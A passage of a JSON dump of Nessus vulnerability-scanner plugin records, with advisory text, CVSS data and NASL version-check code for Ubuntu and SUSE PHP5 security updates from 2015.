(report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php5\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:44:28", "description": "It was discovered that the PHP phar extension incorrectly handled certain files. A remote attacker could use this issue to cause PHP to crash, resulting in a denial of service. (CVE-2015-5589)\n\nIt was discovered that the PHP phar extension incorrectly handled certain filepaths. A remote attacker could use this issue to cause PHP to crash, resulting in a denial of service, or possibly execute arbitrary code. (CVE-2015-5590)\n\nTaoguang Chen discovered that PHP incorrectly handled unserializing objects. A remote attacker could use this issue to cause PHP to crash, resulting in a denial of service, or possibly execute arbitrary code.\n(CVE-2015-6831, CVE-2015-6834, CVE-2015-6835)\n\nSean Heelan discovered that PHP incorrectly handled unserializing objects. A remote attacker could use this issue to cause PHP to crash, resulting in a denial of service, or possibly execute arbitrary code.\n(CVE-2015-6832)\n\nIt was discovered that the PHP phar extension incorrectly handled certain archives. A remote attacker could use this issue to cause files to be placed outside of the destination directory.\n(CVE-2015-6833)\n\nAndrea Palazzo discovered that the PHP Soap client incorrectly validated data types. A remote attacker could use this issue to cause PHP to crash, resulting in a denial of service, or possibly execute arbitrary code. (CVE-2015-6836)\n\nIt was discovered that the PHP XSLTProcessor class incorrectly handled certain data. A remote attacker could use this issue to cause PHP to crash, resulting in a denial of service. 
(CVE-2015-6837).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2015-10-01T00:00:00", "type": "nessus", "title": "Ubuntu 12.04 LTS / 14.04 LTS / 15.04 : php5 vulnerabilities (USN-2758-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5589", "CVE-2015-5590", "CVE-2015-6831", "CVE-2015-6832", "CVE-2015-6833", "CVE-2015-6834", "CVE-2015-6835", "CVE-2015-6836", "CVE-2015-6837", "CVE-2015-6838"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:libapache2-mod-php5", "p-cpe:/a:canonical:ubuntu_linux:php5-cgi", "p-cpe:/a:canonical:ubuntu_linux:php5-cli", "p-cpe:/a:canonical:ubuntu_linux:php5-fpm", "cpe:/o:canonical:ubuntu_linux:12.04:-:lts", "cpe:/o:canonical:ubuntu_linux:14.04", "cpe:/o:canonical:ubuntu_linux:15.04"], "id": "UBUNTU_USN-2758-1.NASL", "href": "https://www.tenable.com/plugins/nessus/86221", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2758-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. 
Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(86221);\n script_version(\"2.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2015-5589\", \"CVE-2015-5590\", \"CVE-2015-6831\", \"CVE-2015-6832\", \"CVE-2015-6833\", \"CVE-2015-6834\", \"CVE-2015-6835\", \"CVE-2015-6836\", \"CVE-2015-6837\", \"CVE-2015-6838\");\n script_xref(name:\"USN\", value:\"2758-1\");\n\n script_name(english:\"Ubuntu 12.04 LTS / 14.04 LTS / 15.04 : php5 vulnerabilities (USN-2758-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that the PHP phar extension incorrectly handled\ncertain files. A remote attacker could use this issue to cause PHP to\ncrash, resulting in a denial of service. (CVE-2015-5589)\n\nIt was discovered that the PHP phar extension incorrectly handled\ncertain filepaths. A remote attacker could use this issue to cause PHP\nto crash, resulting in a denial of service, or possibly execute\narbitrary code. (CVE-2015-5590)\n\nTaoguang Chen discovered that PHP incorrectly handled unserializing\nobjects. A remote attacker could use this issue to cause PHP to crash,\nresulting in a denial of service, or possibly execute arbitrary code.\n(CVE-2015-6831, CVE-2015-6834, CVE-2015-6835\n\nSean Heelan discovered that PHP incorrectly handled unserializing\nobjects. A remote attacker could use this issue to cause PHP to crash,\nresulting in a denial of service, or possibly execute arbitrary code.\n(CVE-2015-6832)\n\nIt was discovered that the PHP phar extension incorrectly handled\ncertain archives. 
A remote attacker could use this issue to cause\nfiles to be placed outside of the destination directory.\n(CVE-2015-6833)\n\nAndrea Palazzo discovered that the PHP Soap client incorrectly\nvalidated data types. A remote attacker could use this issue to cause\nPHP to crash, resulting in a denial of service, or possibly execute\narbitrary code. (CVE-2015-6836)\n\nIt was discovered that the PHP XSLTProcessor class incorrectly handled\ncertain data. A remote attacker could use this issue to cause PHP to\ncrash, resulting in a denial of service. (CVE-2015-6837).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/2758-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libapache2-mod-php5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-cgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-fpm\");\n script_set_attribute(attribute:\"cpe\", 
value:\"cpe:/o:canonical:ubuntu_linux:12.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:15.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/01/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/09/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/10/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2015-2020 Canonical, Inc. / NASL script (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(12\\.04|14\\.04|15\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 12.04 / 14.04 / 15.04\", \"Ubuntu \" + release);\nif ( ! 
get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"12.04\", pkgname:\"libapache2-mod-php5\", pkgver:\"5.3.10-1ubuntu3.20\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"php5-cgi\", pkgver:\"5.3.10-1ubuntu3.20\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"php5-cli\", pkgver:\"5.3.10-1ubuntu3.20\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"php5-fpm\", pkgver:\"5.3.10-1ubuntu3.20\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"libapache2-mod-php5\", pkgver:\"5.5.9+dfsg-1ubuntu4.13\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"php5-cgi\", pkgver:\"5.5.9+dfsg-1ubuntu4.13\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"php5-cli\", pkgver:\"5.5.9+dfsg-1ubuntu4.13\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"php5-fpm\", pkgver:\"5.5.9+dfsg-1ubuntu4.13\")) flag++;\nif (ubuntu_check(osver:\"15.04\", pkgname:\"libapache2-mod-php5\", pkgver:\"5.6.4+dfsg-4ubuntu6.3\")) flag++;\nif (ubuntu_check(osver:\"15.04\", pkgname:\"php5-cgi\", pkgver:\"5.6.4+dfsg-4ubuntu6.3\")) flag++;\nif (ubuntu_check(osver:\"15.04\", pkgname:\"php5-cli\", pkgver:\"5.6.4+dfsg-4ubuntu6.3\")) flag++;\nif (ubuntu_check(osver:\"15.04\", pkgname:\"php5-fpm\", pkgver:\"5.6.4+dfsg-4ubuntu6.3\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libapache2-mod-php5 / php5-cgi / php5-cli / php5-fpm\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-08T14:12:52", "description": "This update of PHP5 brings several security 
fixes.\n\nSecurity fixes :\n\n - CVE-2015-6831: A use after free vulnerability in unserialize() has been fixed which could be used to crash php or potentially execute code. [bnc#942291] [bnc#942294] [bnc#942295]\n\n - CVE-2015-6836: A SOAP serialize_function_call() type confusion leading to remote code execution problem was fixed. [bnc#945428]\n\n - CVE-2015-6837 CVE-2015-6838: Two NULL pointer dereferences in the XSLTProcessor class were fixed.\n [bnc#945412]\n\nIt also includes a bugfix for the odbc module :\n\n - compare with SQL_NULL_DATA correctly [bnc#935074]\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 7.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"}, "published": "2015-10-27T00:00:00", "type": "nessus", "title": "SUSE SLES11 Security Update : php53 (SUSE-SU-2015:1818-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-6831", "CVE-2015-6833", "CVE-2015-6836", "CVE-2015-6837", "CVE-2015-6838"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:apache2-mod_php53", "p-cpe:/a:novell:suse_linux:php53", "p-cpe:/a:novell:suse_linux:php53-bcmath", "p-cpe:/a:novell:suse_linux:php53-bz2", "p-cpe:/a:novell:suse_linux:php53-calendar", "p-cpe:/a:novell:suse_linux:php53-ctype", "p-cpe:/a:novell:suse_linux:php53-curl", "p-cpe:/a:novell:suse_linux:php53-dba", "p-cpe:/a:novell:suse_linux:php53-dom", "p-cpe:/a:novell:suse_linux:php53-exif", "p-cpe:/a:novell:suse_linux:php53-fastcgi", "p-cpe:/a:novell:suse_linux:php53-fileinfo", "p-cpe:/a:novell:suse_linux:php53-ftp", "p-cpe:/a:novell:suse_linux:php53-gd", "p-cpe:/a:novell:suse_linux:php53-gettext", "p-cpe:/a:novell:suse_linux:php53-gmp", "p-cpe:/a:novell:suse_linux:php53-iconv", "p-cpe:/a:novell:suse_linux:php53-intl", "p-cpe:/a:novell:suse_linux:php53-json", 
"p-cpe:/a:novell:suse_linux:php53-ldap", "p-cpe:/a:novell:suse_linux:php53-mbstring", "p-cpe:/a:novell:suse_linux:php53-mcrypt", "p-cpe:/a:novell:suse_linux:php53-mysql", "p-cpe:/a:novell:suse_linux:php53-odbc", "p-cpe:/a:novell:suse_linux:php53-openssl", "p-cpe:/a:novell:suse_linux:php53-pcntl", "p-cpe:/a:novell:suse_linux:php53-pdo", "p-cpe:/a:novell:suse_linux:php53-pear", "p-cpe:/a:novell:suse_linux:php53-pgsql", "p-cpe:/a:novell:suse_linux:php53-pspell", "p-cpe:/a:novell:suse_linux:php53-shmop", "p-cpe:/a:novell:suse_linux:php53-snmp", "p-cpe:/a:novell:suse_linux:php53-soap", "p-cpe:/a:novell:suse_linux:php53-suhosin", "p-cpe:/a:novell:suse_linux:php53-sysvmsg", "p-cpe:/a:novell:suse_linux:php53-sysvsem", "p-cpe:/a:novell:suse_linux:php53-sysvshm", "p-cpe:/a:novell:suse_linux:php53-tokenizer", "p-cpe:/a:novell:suse_linux:php53-wddx", "p-cpe:/a:novell:suse_linux:php53-xmlreader", "p-cpe:/a:novell:suse_linux:php53-xmlrpc", "p-cpe:/a:novell:suse_linux:php53-xmlwriter", "p-cpe:/a:novell:suse_linux:php53-xsl", "p-cpe:/a:novell:suse_linux:php53-zip", "p-cpe:/a:novell:suse_linux:php53-zlib", "cpe:/o:novell:suse_linux:11"], "id": "SUSE_SU-2015-1818-1.NASL", "href": "https://www.tenable.com/plugins/nessus/86616", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2015:1818-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(86616);\n script_version(\"2.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2015-6831\", \"CVE-2015-6833\", \"CVE-2015-6836\", \"CVE-2015-6837\", \"CVE-2015-6838\");\n\n script_name(english:\"SUSE SLES11 Security Update : php53 (SUSE-SU-2015:1818-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n 
script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update of PHP5 brings several security fixes.\n\nSecurity fixes :\n\n - CVE-2015-6831: A use after free vulnerability in\n unserialize() has been fixed which could be used to\n crash php or potentially execute code. [bnc#942291]\n [bnc#942294] [bnc#942295]\n\n - CVE-2015-6836: A SOAP serialize_function_call() type\n confusion leading to remote code execution problem was\n fixed. [bnc#945428]\n\n - CVE-2015-6837 CVE-2015-6838: Two NULL pointer\n dereferences in the XSLTProcessor class were fixed.\n [bnc#945412]\n\nIt also includes a bugfix for the odbc module :\n\n - compare with SQL_NULL_DATA correctly [bnc#935074]\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=935074\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=942291\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=942294\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=942295\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=942296\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=945412\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=945428\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 
value:\"https://www.suse.com/security/cve/CVE-2015-6831/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-6833/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-6836/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-6837/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-6838/\"\n );\n # https://www.suse.com/support/update/announcement/2015/suse-su-20151818-1.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?db1bd10e\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Software Development Kit 11-SP4 :\n\nzypper in -t patch sdksp4-php53-12163=1\n\nSUSE Linux Enterprise Software Development Kit 11-SP3 :\n\nzypper in -t patch sdksp3-php53-12163=1\n\nSUSE Linux Enterprise Server for VMWare 11-SP3 :\n\nzypper in -t patch slessp3-php53-12163=1\n\nSUSE Linux Enterprise Server 11-SP4 :\n\nzypper in -t patch slessp4-php53-12163=1\n\nSUSE Linux Enterprise Server 11-SP3 :\n\nzypper in -t patch slessp3-php53-12163=1\n\nSUSE Linux Enterprise Debuginfo 11-SP4 :\n\nzypper in -t patch dbgsp4-php53-12163=1\n\nSUSE Linux Enterprise Debuginfo 11-SP3 :\n\nzypper in -t patch dbgsp3-php53-12163=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n 
script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:apache2-mod_php53\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-bz2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-calendar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-ctype\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-curl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-dom\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-exif\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-fastcgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-fileinfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-ftp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-gettext\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-gmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-iconv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-intl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-json\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-ldap\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-mcrypt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-pcntl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-pear\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-pspell\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-shmop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-suhosin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-sysvmsg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-sysvsem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-sysvshm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-tokenizer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-wddx\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-xmlreader\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-xmlrpc\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-xmlwriter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-xsl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-zip\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-zlib\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/01/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/09/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/10/27\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^(SLES11)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES11\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES11\" && (! preg(pattern:\"^(3|4)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES11 SP3/4\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"apache2-mod_php53-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-bcmath-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-bz2-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-calendar-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-ctype-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-curl-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-dba-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-dom-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-exif-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-fastcgi-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-fileinfo-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-ftp-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-gd-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", 
reference:\"php53-gettext-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-gmp-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-iconv-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-intl-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-json-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-ldap-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-mbstring-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-mcrypt-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-mysql-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-odbc-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-openssl-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-pcntl-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-pdo-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-pear-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-pgsql-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-pspell-5.3.17-48.1\")) flag++;\nif 